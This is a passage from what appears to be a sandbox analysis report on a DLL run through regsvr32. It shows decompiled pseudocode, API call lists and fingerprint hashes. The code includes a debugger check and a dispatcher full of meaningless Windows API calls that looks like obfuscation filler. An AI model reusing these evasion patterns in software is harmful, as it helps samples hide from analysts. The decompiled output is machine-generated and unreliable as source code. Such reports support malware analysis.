    					_t55 = _a4;
    					asm("int 0x29");
    				}
    				E6F849954(_t34);
    				 *_t60 = 0x2cc;
    				_v632 = E6F84A330(_t58,  &_v808, 0, 3);
    				_v636 = _t55;
    				_v640 = _t57;
    				_v644 = _t51;
    				_v648 = _t59;
    				_v652 = _t58;
    				_v608 = ss;
    				_v620 = cs;
    				_v656 = ds;
    				_v660 = es;
    				_v664 = fs;
    				_v668 = gs;
    				asm("pushfd");
    				_pop( *_t15);
    				_v624 = _v0;
    				_t39 =  &_v0;
    				_v612 = _t39;
    				_v808 = 0x10001;
    				_v628 =  *((intOrPtr*)(_t39 - 4));
    				E6F84A330(_t58,  &_v92, 0, 0x50);
    				_v92 = 0x40000015;
    				_v88 = 1;
    				_v80 = _v0;
    				_t28 = IsDebuggerPresent() - 1; // -1
    				_v12.ExceptionRecord =  &_v92;
    				asm("sbb bl, bl");
    				_v12.ContextRecord =  &_v808;
    				_t54 =  ~_t28 + 1;
    				SetUnhandledExceptionFilter(0);
    				_t49 = UnhandledExceptionFilter( &_v12);
    				if(_t49 == 0 && _t54 == 0) {
    					_push(3);
    					return E6F849954(_t49);
    				}
    				return _t49;
    			}



































    APIs
    • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 6F849845
    • IsDebuggerPresent.KERNEL32 ref: 6F849911
    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6F849931
    • UnhandledExceptionFilter.KERNEL32(?), ref: 6F84993B
    Memory Dump Source
    • Source File: 00000026.00000002.798203237.000000006F841000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F840000, based on PE: true
    • Associated: 00000026.00000002.798195732.000000006F840000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000026.00000002.798217144.000000006F855000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000026.00000002.798226864.000000006F85C000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000026.00000002.798233382.000000006F85E000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_38_2_6f840000_regsvr32.jbxd
    Similarity
    • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
    • String ID:
    • API String ID: 254469556-0
    • Opcode ID: f4f6309902edbffa0cfa61ec11645906f2f8d393b2a5486c16f6e01efe85b181
    • Instruction ID: c527434b04eb0eb2e24f6c3bafee487a826135c3bafef0a8bab67c7e8602e548
    • Opcode Fuzzy Hash: f4f6309902edbffa0cfa61ec11645906f2f8d393b2a5486c16f6e01efe85b181
    • Instruction Fuzzy Hash: 0731F67590531D9BDF60DF64C9897CDBBB8AF04304F1040EAE40DAB280EB749A88CF44
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 61%
    			E6F848630(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
    				intOrPtr _v8;
    				long _v12;
    				int _v16;
    				int _v20;
    				long _v24;
    				intOrPtr _v28;
    				intOrPtr _v32;
    				intOrPtr _v36;
    				intOrPtr _v40;
    				int _v44;
    				struct HMENU__* _v48;
    				intOrPtr _v52;
    				int _v56;
    				WCHAR* _v60;
    				intOrPtr _v64;
    				intOrPtr _v68;
    				int _v72;
    				intOrPtr _v76;
    				long _v80;
    				long _v84;
    				long _v88;
    				long _v92;
    				intOrPtr _v96;
    				int _v100;
    				intOrPtr _v104;
    				intOrPtr _v108;
    				intOrPtr _v112;
    				intOrPtr _v116;
    				struct _SID_IDENTIFIER_AUTHORITY* _v120;
    				int _v124;
    				int _v128;
    				int _v132;
    				intOrPtr _v136;
    				long _v140;
    				long _v144;
    				void* _v148;
    				char _v164;
    				void* _t116;
    				intOrPtr _t118;
    				void* _t180;
    
    				if((E6F845D90(__eflags) & 0x000000ff) == 0) {
    					L87:
    					__eflags = 0;
    					return 0;
    				}
    				_t184 = _a4;
    				if(_a4 == 0) {
    					goto L87;
    				}
    				_t116 = E6F845910(_t184);
    				_t185 = _t116;
    				if(_t116 == 0) {
    					return 1;
    				}
    				_t118 = E6F847700(_t185);
    				if(_t118 == 0) {
    					return 1;
    				}
    				if(_a4 == 2) {
    					_v12 = FormatMessageA(0, 0, 0, 0, 0, 0, 0);
    					return _a4;
    				}
    				__eflags = _a4 - 3;
    				if(_a4 == 3) {
    					_v16 = TextOutW(0, 0, 0, 0, 0);
    					return _a4;
    				}
    				__eflags = _a4 - 4;
    				if(_a4 != 4) {
    					__eflags = _a4 - 5;
    					if(_a4 != 5) {
    						__eflags = _a4 - 6;
    						if(_a4 != 6) {
    							__eflags = _a4 - 7;
    							if(_a4 != 7) {
    								__eflags = _a4 - 8;
    								if(_a4 != 8) {
    									__eflags = _a4 - 9;
    									if(_a4 != 9) {
    										__eflags = _a4 - 0xa;
    										if(_a4 != 0xa) {
    											__eflags = _a4 - 0xb;
    											if(_a4 != 0xb) {
    												__eflags = _a4 - 0xc;
    												if(_a4 != 0xc) {
    													__eflags = _a4 - 0xd;
    													if(_a4 != 0xd) {
    														__eflags = _a4 - 0xe;
    														if(_a4 != 0xe) {
    															__eflags = _a4 - 0xf;
    															if(_a4 != 0xf) {
    																__eflags = _a4 - 0x10;
    																if(_a4 != 0x10) {
    																	__eflags = _a4 - 0x11;
    																	if(_a4 != 0x11) {
    																		__eflags = _a4 - 0x12;
    																		if(_a4 != 0x12) {
    																			__eflags = _a4 - 0x13;
    																			if(_a4 != 0x13) {
    																				__eflags = _a4 - 0x14;
    																				if(_a4 != 0x14) {
    																					__eflags = _a4 - 0x15;
    																					if(_a4 != 0x15) {
    																						__eflags = _a4 - 0x16;
    																						if(_a4 != 0x16) {
    																							__eflags = _a4 - 0x17;
    																							if(_a4 != 0x17) {
    																								__eflags = _a4 - 0x18;
    																								if(_a4 != 0x18) {
    																									__eflags = _a4 - 0x19;
    																									if(_a4 != 0x19) {
    																										__eflags = _a4 - 0x1a;
    																										if(_a4 != 0x1a) {
    																											__eflags = _a4 - 0x1b;
    																											if(_a4 != 0x1b) {
    																												__eflags = _a4 - 1;
    																												if(_a4 == 1) {
    																													__eflags = _a8;
    																													if(_a8 != 0) {
    																														__eflags = E6F847670();
    																														if(__eflags == 0) {
    																															_t118 = E6F846960(_t180);
    																															__eflags = _t118;
    																															if(_t118 != 0) {
    																																_t118 = E6F847770();
    																																_v8 = _t118;
    																																__eflags = _v8 - 1;
    																																if(_v8 == 1) {
    																																	__eflags = E6F8471E0();
    																																	if(__eflags == 0) {
    																																		_t118 = E6F846390(__eflags);
    																																	} else {
    																																		_t118 = E6F846390(__eflags);
    																																	}
    																																}
    																															}
    																														} else {
    																															_t118 = E6F846390(__eflags);
    																														}
    																													}
    																												}
    																												__eflags = _a4 - 0x1c;
    																												if(_a4 != 0x1c) {
    																													__eflags = _a4 - 0x1d;
    																													if(_a4 != 0x1d) {
    																														__eflags = _a4 - 0x1e;
    																														if(_a4 != 0x1e) {
    																															__eflags = _a4 - 0x1f;
    																															if(_a4 != 0x1f) {
    																																__eflags = _a4 - 0x20;
    																																if(_a4 != 0x20) {
    																																	__eflags = _a4 - 0x21;
    																																	if(_a4 != 0x21) {
    																																		__eflags = _a4 - 0x22;
    																																		if(_a4 != 0x22) {
    																																			__eflags = _a4 - 0x23;
    																																			if(_a4 != 0x23) {
    																																				__eflags = _a4 - 0x24;
    																																				if(_a4 != 0x24) {
    																																					goto L87;
    																																				}
    																																				_v148 = DuplicateIcon(0, 0);
    																																				return _a4;
    																																			}
    																																			_v144 = SHStrDupA(0, 0);
    																																			return _a4;
    																																		}
    																																		_v140 = SHStrDupW(0, 0);
    																																		return _a4;
    																																	}
    																																	__imp__CreateMutexExW(0, 0, 0, 0);
    																																	_v136 = _t118;
    																																	return _a4;
    																																}
    																																_v132 = IsValidSid(0);
    																																return _a4;
    																															}
    																															_v128 = IsValidAcl(0);
    																															return _a4;
    																														}
    																														_v124 = DisableThreadLibraryCalls(0);
    																														return _a4;
    																													}
    																													_v120 = GetSidIdentifierAuthority(0);
    																													return _a4;
    																												}
    																												__imp__CoTaskMemAlloc(0);
    																												_v116 = _t118;
    																												return _a4;
    																											}
    																											__imp__CoCancelCall(0, 0);
    																											_v112 = _t118;
    																											return _a4;
    																										}
    																										__imp__CveEventWrite(0, 0);
    																										_v108 = _t118;
    																										return _a4;
    																									}
    																									__imp__RpcExceptionFilter(0);
    																									_v104 = _t118;
    																									return _a4;
    																								}
    																								_v100 = RevertToSelf();
    																								return _a4;
    																							}
    																							__imp__IsTokenRestricted(0);
    																							_v96 = _t118;
    																							return _a4;
    																						}
    																						_v92 = GetProcessId(0);
    																						return _a4;
    																					}
    																					_v88 = GetPriorityClass(0);
    																					return _a4;
    																				}
    																				_v84 = GetVersion();
    																				return _a4;
    																			}
    																			_v80 = GetMessageTime();
    																			return _a4;
    																		}
    																		__imp__UuidCreate(0);
    																		_v76 = _t118;
    																		return _a4;
    																	}
    																	_v72 = GetConsoleCP();
    																	return _a4;
    																}
    																__imp__DceErrorInqTextA(0, 0);
    																_v68 = _t118;
    																return _a4;
    															}
    															__imp__SHGetThreadRef(0);
    															_v64 = _t118;
    															return _a4;
    														}
    														_v60 = CharNextW(0);
    														return _a4;
    													}
    													_v56 = SetFileAttributesW(0, 0);
    													return _a4;
    												}
    												__imp__GetProductInfo(0, 0, 0, 0, 0);
    												_v52 = _t118;
    												return _a4;
    											}
    											_v48 = CreatePopupMenu();
    											return _a4;
    										}
    										_v44 = FlattenPath(0);
    										return _a4;
    									}
    									__imp__CoGetCallerTID(0);
    									_v40 = _t118;
    									return _a4;
    								}
    								__imp__CoCreateInstance( &_v164, 0, 0,  &_v164, 0);
    								_v36 = _t118;
    								return _a4;
    							}
    							__imp__OleInitialize(0);
    							_v32 = _t118;
    							return _a4;
    						}
    						__imp__CoInitialize(0);
    						_v28 = _t118;
    						return _a4;
    					}
    					_v24 = FormatMessageW(0, 0, 0, 0, 0, 0, 0);
    					return _a4;
    				} else {
    					_v20 = TextOutA(0, 0, 0, 0, 0);
    					return _a4;
    				}
    			}

    APIs
      • Part of subcall function 6F845D90: LoadLibraryA.KERNEL32(?,KERNEL32.dll,00000000), ref: 6F845EBF
    • FormatMessageA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6F848681
    • TextOutW.GDI32(00000000,00000000,00000000,00000000,00000000), ref: 6F8486A2
    Strings
    Memory Dump Source
    • Source File: 00000026.00000002.798203237.000000006F841000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F840000, based on PE: true
    • Associated: 00000026.00000002.798195732.000000006F840000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000026.00000002.798217144.000000006F855000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000026.00000002.798226864.000000006F85C000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000026.00000002.798233382.000000006F85E000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_38_2_6f840000_regsvr32.jbxd
    Similarity
    • API ID: FormatLibraryLoadMessageText
    • String ID: $
    • API String ID: 775064453-3993045852
    • Opcode ID: c85d22d830a4f61c43e4195fc6f7fe41ada78860079dea31cb39602940eca8ba
    • Instruction ID: 2d693a5374c2eab2f6b8340f088da7c62020754ebf413ff9681a9f0a002ee3e1
    • Opcode Fuzzy Hash: c85d22d830a4f61c43e4195fc6f7fe41ada78860079dea31cb39602940eca8ba
    • Instruction Fuzzy Hash: FAC1C630A8930CEFDF94DFA8C54978C7BB0AF06356F108995E9099E680D774A594CBE2
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E6F850367(intOrPtr _a4) {
    				intOrPtr _v8;
    				intOrPtr _t25;
    				intOrPtr* _t26;
    				intOrPtr _t28;
    				intOrPtr* _t29;
    				intOrPtr* _t31;
    				intOrPtr* _t45;
    				intOrPtr* _t46;
    				intOrPtr* _t47;
    				intOrPtr* _t55;
    				intOrPtr* _t70;
    				intOrPtr _t74;
    
    				_t74 = _a4;
    				_t25 =  *((intOrPtr*)(_t74 + 0x88));
    				if(_t25 != 0 && _t25 != 0x6f85c708) {
    					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
    					if(_t45 != 0 &&  *_t45 == 0) {
    						_t46 =  *((intOrPtr*)(_t74 + 0x84));
    						if(_t46 != 0 &&  *_t46 == 0) {
    							E6F84DC0E(_t46);
    							E6F85180D( *((intOrPtr*)(_t74 + 0x88)));
    						}
    						_t47 =  *((intOrPtr*)(_t74 + 0x80));
    						if(_t47 != 0 &&  *_t47 == 0) {
    							E6F84DC0E(_t47);
    							E6F85190B( *((intOrPtr*)(_t74 + 0x88)));
    						}
    						E6F84DC0E( *((intOrPtr*)(_t74 + 0x7c)));
    						E6F84DC0E( *((intOrPtr*)(_t74 + 0x88)));
    					}
    				}
    				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
    				if(_t26 != 0 &&  *_t26 == 0) {
    					E6F84DC0E( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
    					E6F84DC0E( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
    					E6F84DC0E( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
    					E6F84DC0E( *((intOrPtr*)(_t74 + 0x8c)));
    				}
    				E6F8504D8( *((intOrPtr*)(_t74 + 0x9c)));
    				_t28 = 6;
    				_t55 = _t74 + 0xa0;
    				_v8 = _t28;
    				_t70 = _t74 + 0x28;
    				do {
    					if( *((intOrPtr*)(_t70 - 8)) != 0x6f85c1d8) {
    						_t31 =  *_t70;
    						if(_t31 != 0 &&  *_t31 == 0) {
    							E6F84DC0E(_t31);
    							E6F84DC0E( *_t55);
    						}
    						_t28 = _v8;
    					}
    					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
    						_t29 =  *((intOrPtr*)(_t70 - 4));
    						if(_t29 != 0 &&  *_t29 == 0) {
    							E6F84DC0E(_t29);
    						}
    						_t28 = _v8;
    					}
    					_t55 = _t55 + 4;
    					_t70 = _t70 + 0x10;
    					_t28 = _t28 - 1;
    					_v8 = _t28;
    				} while (_t28 != 0);
    				return E6F84DC0E(_t74);
    			}

    APIs
    • ___free_lconv_mon.LIBCMT ref: 6F8503AB
      • Part of subcall function 6F85180D: _free.LIBCMT ref: 6F85182A
      • Part of subcall function 6F85180D: _free.LIBCMT ref: 6F85183C
      • Part of subcall function 6F85180D: _free.LIBCMT ref: 6F85184E
      • Part of subcall function 6F85180D: _free.LIBCMT ref: 6F851860
      • Part of subcall function 6F85180D: _free.LIBCMT ref: 6F851872
      • Part of subcall function 6F85180D: _free.LIBCMT ref: 6F851884
      • Part of subcall function 6F85180D: _free.LIBCMT ref: 6F851896
      • Part of subcall function 6F85180D: _free.LIBCMT ref: 6F8518A8
      • Part of subcall function 6F85180D: _free.LIBCMT ref: 6F8518BA
      • Part of subcall function 6F85180D: _free.LIBCMT ref: 6F8518CC
      • Part of subcall function 6F85180D: _free.LIBCMT ref: 6F8518DE
      • Part of subcall function 6F85180D: _free.LIBCMT ref: 6F8518F0
      • Part of subcall function 6F85180D: _free.LIBCMT ref: 6F851902
    • _free.LIBCMT ref: 6F8503A0
      • Part of subcall function 6F84DC0E: RtlFreeHeap.NTDLL(00000000,00000000,?,6F85199E,?,00000000,?,?,?,6F8519C5,?,00000007,?,?,6F8504FE,?), ref: 6F84DC24
      • Part of subcall function 6F84DC0E: GetLastError.KERNEL32(?,?,6F85199E,?,00000000,?,?,?,6F8519C5,?,00000007,?,?,6F8504FE,?,?), ref: 6F84DC36
    • _free.LIBCMT ref: 6F8503C2
    • _free.LIBCMT ref: 6F8503D7
    • _free.LIBCMT ref: 6F8503E2
    • _free.LIBCMT ref: 6F850404
    • _free.LIBCMT ref: 6F850417
    • _free.LIBCMT ref: 6F850425
    • _free.LIBCMT ref: 6F850430
    • _free.LIBCMT ref: 6F850468
    • _free.LIBCMT ref: 6F85046F
    • _free.LIBCMT ref: 6F85048C
    • _free.LIBCMT ref: 6F8504A4
    Memory Dump Source
    • Source File: 00000026.00000002.798203237.000000006F841000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F840000, based on PE: true
    • Associated: 00000026.00000002.798195732.000000006F840000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000026.00000002.798217144.000000006F855000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000026.00000002.798226864.000000006F85C000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000026.00000002.798233382.000000006F85E000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_38_2_6f840000_regsvr32.jbxd
    Similarity
    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
    • String ID:
    • API String ID: 161543041-0
    • Opcode ID: 036e9d47e2115af19903abb6fcdd8fada6105433581af161352e6d67287489f1
    • Instruction ID: 994ed450c550fc9955c1b9bccc1f59197d9514bf81c5dc32da09a1ada55c7821
    • Opcode Fuzzy Hash: 036e9d47e2115af19903abb6fcdd8fada6105433581af161352e6d67287489f1
    • Instruction Fuzzy Hash: 2C314532504709EFEB559A79D940B8A73EAAF0035CF105D9AE455DF290EF70F891CB10
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 72%
    			E6F84B0CB(signed int __edx, signed char* _a4, signed int _a8, signed int _a12, char _a16, signed int* _a20, signed int _a24, signed int _a28, signed int _a32) {
    				signed char* _v0;
    				signed int _v8;
    				signed int _v12;
    				signed int _v16;
    				signed int _v20;
    				intOrPtr _v24;
    				char _v28;
    				signed int _v32;
    				signed int _v36;
    				signed int _v40;
    				signed int _v44;
    				intOrPtr _v48;
    				signed int _v52;
    				intOrPtr _v56;
    				intOrPtr _v60;
    				void _v64;
    				signed int _v68;
    				char _v84;
    				intOrPtr _v88;
    				signed int _v92;
    				intOrPtr _v100;
    				void _v104;
    				intOrPtr* _v112;
    				signed char* _v184;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				void* __ebp;
    				void* _t202;
    				signed int _t203;
    				char _t204;
    				signed int _t206;
    				signed int _t208;
    				signed char* _t209;
    				signed int _t210;
    				signed int _t211;
    				signed int _t215;
    				void* _t218;
    				signed char* _t221;
    				void* _t223;
    				void* _t225;
    				signed char _t229;
    				signed int _t230;
    				void* _t232;
    				void* _t235;
    				void* _t238;
    				signed char _t245;
    				signed int _t250;
    				void* _t253;
    				signed int* _t255;
    				signed int _t256;
    				intOrPtr _t257;
    				signed int _t258;
    				void* _t263;
    				void* _t268;
    				void* _t269;
    				signed int _t273;
    				signed char* _t274;
    				intOrPtr* _t275;
    				signed char _t276;
    				signed int _t277;
    				signed int _t278;
    				intOrPtr* _t280;
    				signed int _t281;
    				signed int _t282;
    				signed int _t287;
    				signed int _t294;
    				signed int _t295;
    				signed int _t298;
    				signed int _t300;
    				signed char* _t301;
    				signed int _t302;
    				signed int _t303;
    				signed int* _t305;
    				signed char* _t308;
    				signed int _t318;
    				signed int _t319;
    				signed int _t321;
    				signed int _t330;
    				void* _t332;
    				void* _t334;
    				void* _t335;
    				void* _t336;
    				void* _t337;
    
    				_t300 = __edx;
    				_push(_t319);
    				_t305 = _a20;
    				_v20 = 0;
    				_v28 = 0;
    				_t279 = E6F84C03D(_a8, _a16, _t305);
    				_t335 = _t334 + 0xc;
    				_v12 = _t279;
    				if(_t279 < 0xffffffff || _t279 >= _t305[1]) {
    					L66:
    					_t202 = E6F84D547(_t274, _t279, _t300, _t305, _t319);
    					asm("int3");
    					_t332 = _t335;
    					_t336 = _t335 - 0x38;
    					_push(_t274);
    					_t275 = _v112;
    					__eflags =  *_t275 - 0x80000003;
    					if( *_t275 == 0x80000003) {
    						return _t202;
    					} else {
    						_push(_t319);
    						_push(_t305);
    						_t203 = E6F84AD86(_t275, _t279, _t300, _t305, _t319);
    						__eflags =  *(_t203 + 8);
    						if( *(_t203 + 8) != 0) {
    							__imp__EncodePointer(0);
    							_t319 = _t203;
    							_t223 = E6F84AD86(_t275, _t279, _t300, 0, _t319);
    							__eflags =  *((intOrPtr*)(_t223 + 8)) - _t319;
    							if( *((intOrPtr*)(_t223 + 8)) != _t319) {
    								__eflags =  *_t275 - 0xe0434f4d;
    								if( *_t275 != 0xe0434f4d) {
    									__eflags =  *_t275 - 0xe0434352;
    									if( *_t275 != 0xe0434352) {
    										_t215 = E6F84A645(_t300, 0, _t319, _t275, _a4, _a8, _a12, _a16, _a24, _a28);
    										_t336 = _t336 + 0x1c;
    										__eflags = _t215;
    										if(_t215 != 0) {
    											L83:
    											return _t215;
    										}
    									}
    								}
    							}
    						}
    						_t204 = _a16;
    						_v28 = _t204;
    						_v24 = 0;
    						__eflags =  *(_t204 + 0xc);
    						if( *(_t204 + 0xc) > 0) {
    							_push(_a24);
    							E6F84A578(_t275, _t279, 0, _t319,  &_v44,  &_v28, _a20, _a12, _t204);
    							_t302 = _v40;
    							_t337 = _t336 + 0x18;
    							_t215 = _v44;
    							_v20 = _t215;
    							_v12 = _t302;
    							__eflags = _t302 - _v32;
    							if(_t302 >= _v32) {
    								goto L83;
    							}
    							_t281 = _t302 * 0x14;
    							__eflags = _t281;
    							_v16 = _t281;
    							do {
    								_t282 = 5;
    								_t218 = memcpy( &_v64,  *((intOrPtr*)( *_t215 + 0x10)) + _t281, _t282 << 2);
    								_t337 = _t337 + 0xc;
    								__eflags = _v64 - _t218;
    								if(_v64 > _t218) {
    									goto L82;
    								}
    								__eflags = _t218 - _v60;
    								if(_t218 > _v60) {
    									goto L82;
    								}
    								_t221 = _v48 + 0xfffffff0 + (_v52 << 4);
    								_t287 = _t221[4];
    								__eflags = _t287;
    								if(_t287 == 0) {
    									L80:
    									__eflags =  *_t221 & 0x00000040;
    									if(( *_t221 & 0x00000040) == 0) {
    										_push(0);
    										_push(1);
    										E6F84B04B(_t302, _t275, _a4, _a8, _a12, _a16, _t221, 0,  &_v64, _a24, _a28);
    										_t302 = _v12;
    										_t337 = _t337 + 0x30;
    									}
    									goto L82;
    								}
    								__eflags =  *((char*)(_t287 + 8));
    								if( *((char*)(_t287 + 8)) != 0) {
    									goto L82;
    								}
    								goto L80;
    								L82:
    								_t302 = _t302 + 1;
    								_t215 = _v20;
    								_t281 = _v16 + 0x14;
    								_v12 = _t302;
    								_v16 = _t281;
    								__eflags = _t302 - _v32;
    							} while (_t302 < _v32);
    							goto L83;
    						}
    						E6F84D547(_t275, _t279, _t300, 0, _t319);
    						asm("int3");
    						_push(_t332);
    						_t301 = _v184;
    						_push(_t275);
    						_push(_t319);
    						_push(0);
    						_t206 = _t301[4];
    						__eflags = _t206;
    						if(_t206 == 0) {
    							L108:
    							_t208 = 1;
    							__eflags = 1;
    						} else {
    							_t280 = _t206 + 8;
    							__eflags =  *_t280;
    							if( *_t280 == 0) {
    								goto L108;
    							} else {
    								__eflags =  *_t301 & 0x00000080;
    								_t308 = _v0;
    								if(( *_t301 & 0x00000080) == 0) {
    									L90:
    									_t276 = _t308[4];
    									_t321 = 0;
    									__eflags = _t206 - _t276;
    									if(_t206 == _t276) {
    										L100:
    										__eflags =  *_t308 & 0x00000002;
    										if(( *_t308 & 0x00000002) == 0) {
    											L102:
    											_t209 = _a4;
    											__eflags =  *_t209 & 0x00000001;
    											if(( *_t209 & 0x00000001) == 0) {
    												L104:
    												__eflags =  *_t209 & 0x00000002;
    												if(( *_t209 & 0x00000002) == 0) {
    													L106:
    													_t321 = 1;
    													__eflags = 1;
    												} else {
    													__eflags =  *_t301 & 0x00000002;
    													if(( *_t301 & 0x00000002) != 0) {
    														goto L106;
    													}
    												}
    											} else {
    												__eflags =  *_t301 & 0x00000001;
    												if(( *_t301 & 0x00000001) != 0) {
    													goto L104;
    												}
    											}
    										} else {
    											__eflags =  *_t301 & 0x00000008;
    											if(( *_t301 & 0x00000008) != 0) {
    												goto L102;
    											}
    										}
    										_t208 = _t321;
    									} else {
    										_t185 = _t276 + 8; // 0x6e
    										_t210 = _t185;
    										while(1) {
    											_t277 =  *_t280;
    											__eflags = _t277 -  *_t210;
    											if(_t277 !=  *_t210) {
    												break;
    											}
    											__eflags = _t277;
    											if(_t277 == 0) {
    												L96:
    												_t211 = _t321;
    											} else {
    												_t278 =  *((intOrPtr*)(_t280 + 1));
    												__eflags = _t278 -  *((intOrPtr*)(_t210 + 1));
    												if(_t278 !=  *((intOrPtr*)(_t210 + 1))) {
    													break;
    												} else {
    													_t280 = _t280 + 2;
    													_t210 = _t210 + 2;
    													__eflags = _t278;
    													if(_t278 != 0) {
    														continue;
    													} else {
    														goto L96;
    													}
    												}
    											}
    											L98:
    											__eflags = _t211;
    											if(_t211 == 0) {
    												goto L100;
    											} else {
    												_t208 = 0;
    											}
    											goto L109;
    										}
    										asm("sbb eax, eax");
    										_t211 = _t210 | 0x00000001;
    										__eflags = _t211;
    										goto L98;
    									}
    								} else {
    									__eflags =  *_t308 & 0x00000010;
    									if(( *_t308 & 0x00000010) != 0) {
    										goto L108;
    									} else {
    										goto L90;
    									}
    								}
    							}
    						}
    						L109:
    						return _t208;
    					}
    				} else {
    					_t274 = _a4;
    					if( *_t274 != 0xe06d7363 || _t274[0x10] != 3 || _t274[0x14] != 0x19930520 && _t274[0x14] != 0x19930521 && _t274[0x14] != 0x19930522) {
    						L22:
    						_t300 = _a12;
    						_v8 = _t300;
    						goto L24;
    					} else {
    						_t319 = 0;
    						if(_t274[0x1c] != 0) {
    							goto L22;
    						} else {
    							_t225 = E6F84AD86(_t274, _t279, _t300, _t305, 0);
    							if( *((intOrPtr*)(_t225 + 0x10)) == 0) {
    								L60:
    								return _t225;
    							} else {
    								_t274 =  *(E6F84AD86(_t274, _t279, _t300, _t305, 0) + 0x10);
    								_t263 = E6F84AD86(_t274, _t279, _t300, _t305, 0);
    								_v28 = 1;
    								_v8 =  *((intOrPtr*)(_t263 + 0x14));
    								if(_t274 == 0 ||  *_t274 == 0xe06d7363 && _t274[0x10] == 3 && (_t274[0x14] == 0x19930520 || _t274[0x14] == 0x19930521 || _t274[0x14] == 0x19930522) && _t274[0x1c] == _t319) {
    									goto L66;
    								} else {
    									if( *((intOrPtr*)(E6F84AD86(_t274, _t279, _t300, _t305, _t319) + 0x1c)) == _t319) {
    										L23:
    										_t300 = _v8;
    										_t279 = _v12;
    										L24:
    										_v52 = _t305;
    										_v48 = 0;
    										__eflags =  *_t274 - 0xe06d7363;
    										if( *_t274 != 0xe06d7363) {
    											L56:
    											__eflags = _t305[3];
    											if(_t305[3] <= 0) {
    												goto L59;
    											} else {
    												__eflags = _a24;
    												if(_a24 != 0) {
    													goto L66;
    												} else {
    													_push(_a32);
    													_push(_a28);
    													_push(_t279);
    													_push(_t305);
    													_push(_a16);
    													_push(_t300);
    													_push(_a8);
    													_push(_t274);
    													L67();
    													_t335 = _t335 + 0x20;
    													goto L59;
    												}
    											}
    										} else {
    											__eflags = _t274[0x10] - 3;
    											if(_t274[0x10] != 3) {
    												goto L56;
    											} else {
    												__eflags = _t274[0x14] - 0x19930520;
    												if(_t274[0x14] == 0x19930520) {
    													L29:
    													_t319 = _a32;
    													__eflags = _t305[3];
    													if(_t305[3] > 0) {
    														_push(_a28);
    														E6F84A578(_t274, _t279, _t305, _t319,  &_v68,  &_v52, _t279, _a16, _t305);
    														_t300 = _v64;
    														_t335 = _t335 + 0x18;
    														_t250 = _v68;
    														_v44 = _t250;
    														_v16 = _t300;
    														__eflags = _t300 - _v56;
    														if(_t300 < _v56) {
    															_t294 = _t300 * 0x14;
    															__eflags = _t294;
    															_v32 = _t294;
    															do {
    																_t295 = 5;
    																_t253 = memcpy( &_v104,  *((intOrPtr*)( *_t250 + 0x10)) + _t294, _t295 << 2);
    																_t335 = _t335 + 0xc;
    																__eflags = _v104 - _t253;
    																if(_v104 <= _t253) {
    																	__eflags = _t253 - _v100;
    																	if(_t253 <= _v100) {
    																		_t298 = 0;
    																		_v20 = 0;
    																		__eflags = _v92;
    																		if(_v92 != 0) {
    																			_t255 =  *(_t274[0x1c] + 0xc);
    																			_t303 =  *_t255;
    																			_t256 =  &(_t255[1]);
    																			__eflags = _t256;
    																			_v36 = _t256;
    																			_t257 = _v88;
    																			_v40 = _t303;
    																			_v24 = _t257;
    																			do {
    																				asm("movsd");
    																				asm("movsd");
    																				asm("movsd");
    																				asm("movsd");
    																				_t318 = _v36;
    																				_t330 = _t303;
    																				__eflags = _t330;
    																				if(_t330 <= 0) {
    																					goto L40;
    																				} else {
    																					while(1) {
    																						_push(_t274[0x1c]);
    																						_t258 =  &_v84;
    																						_push( *_t318);
    																						_push(_t258);
    																						L86();
    																						_t335 = _t335 + 0xc;
    																						__eflags = _t258;
    																						if(_t258 != 0) {
    																							break;
    																						}
    																						_t330 = _t330 - 1;
    																						_t318 = _t318 + 4;
    																						__eflags = _t330;
    																						if(_t330 > 0) {
    																							continue;
    																						} else {
    																							_t298 = _v20;
    																							_t257 = _v24;
    																							_t303 = _v40;
    																							goto L40;
    																						}
    																						goto L43;
    																					}
    																					_push(_a24);
    																					_push(_v28);
    																					E6F84B04B(_t303, _t274, _a8, _v8, _a16, _a20,  &_v84,  *_t318,  &_v104, _a28, _a32);
    																					_t335 = _t335 + 0x30;
    																				}
    																				L43:
    																				_t300 = _v16;
    																				goto L44;
    																				L40:
    																				_t298 = _t298 + 1;
    																				_t257 = _t257 + 0x10;
    																				_v20 = _t298;
    																				_v24 = _t257;
    																				__eflags = _t298 - _v92;
    																			} while (_t298 != _v92);
    																			goto L43;
    																		}
    																	}
    																}
    																L44:
    																_t300 = _t300 + 1;
    																_t250 = _v44;
    																_t294 = _v32 + 0x14;
    																_v16 = _t300;
    																_v32 = _t294;
    																__eflags = _t300 - _v56;
    															} while (_t300 < _v56);
    															_t305 = _a20;
    															_t319 = _a32;
    														}
    													}
    													__eflags = _a24;
